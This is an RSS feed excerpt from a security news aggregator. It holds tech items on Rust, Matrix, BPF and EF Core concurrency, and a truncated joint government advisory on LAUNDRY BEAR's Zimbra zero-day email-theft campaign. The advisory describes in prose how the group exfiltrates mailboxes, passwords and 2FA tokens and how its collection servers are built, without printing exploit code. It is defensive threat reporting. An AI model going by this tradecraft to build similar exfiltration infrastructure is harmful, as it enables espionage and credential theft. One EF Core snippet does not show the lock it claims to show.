<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Matrix Live S12E09: The Matrix Spring Update 2026 from The Matrix Community Summit]]></title>
<description><![CDATA[Author: Matrixdotorg - Bewertung: 30x - Views:605 In which Matthew gives an update on everything happening in Matrix as of May 2026, including the Spec Core Team and Foundation priorities, Project Hydra to improve federation robustness, how Hydra unlocks vanilla MLS on Matrix, and the resurgence ...]]></description>
<link>https://tsecurity.de/de/3693338/videos/matrix-live-s12e09-the-matrix-spring-update-2026-from-the-matrix-community-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693338/videos/matrix-live-s12e09-the-matrix-spring-update-2026-from-the-matrix-community-summit/</guid>
<pubDate>Sat, 25 Jul 2026 08:42:18 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Matrixdotorg - Bewertung: 30x - Views:605 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/5Q2vAktusrY?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>In which Matthew gives an update on everything happening in Matrix as of May 2026, including the Spec Core Team and Foundation priorities, Project Hydra to improve federation robustness, how Hydra unlocks vanilla MLS on Matrix, and the resurgence of P2P Matrix!<br />
<br />
Matrix Community Summit: https://matrix-community.events/conferences/2026-summit.html<br />
Schedule: https://openki.matrix-community.events/event/eu43r8WTeHsCMEBsE/the-matrix-spring-update-2026<br />
<br />
This Week in Matrix: https://matrix.org/twim<br />
<br />
Find Matrix.org on the internet:<br />
🐘 https://mastodon.matrix.org/@matrix<br />
🤝 https://www.linkedin.com/company/matrix-org<br />
🦋 https://bsky.app/profile/matrix.org<br />
[m] Office of the Matrix Foundation https://matrix.to/#/%23foundation-office:matrix.org<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] An update on netkit and the use of BPF in user space]]></title>
<description><![CDATA[Daniel Borkmann led a session at the 2026

Linux Filesystem, Memory-Management,
and BPF Summit about the progress that has been made with netkit, the subsystem
that allows virtual machines (VMs) running on Linux to perform networking efficiently.
When that did not fill the full time, he went on t...]]></description>
<link>https://tsecurity.de/de/3691682/linux-tipps/an-update-on-netkit-and-the-use-of-bpf-in-user-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691682/linux-tipps/an-update-on-netkit-and-the-use-of-bpf-in-user-space/</guid>
<pubDate>Fri, 24 Jul 2026 15:33:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Daniel Borkmann led a session at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Filesystem, Memory-Management,
and BPF Summit</a> about the progress that has been made with netkit, the subsystem
that allows virtual machines (VMs) running on Linux to perform networking efficiently.
When that did not fill the full time, he went on to discuss his idea for
using BPF to live-patch user-space applications. While netkit is making
progress, and can now support zero-copy receipt of packets into a VM in a
network namespace, the idea of using BPF for patching user-space programs
remains entirely speculative.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Thu, 23 Jul 2026 16:59:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
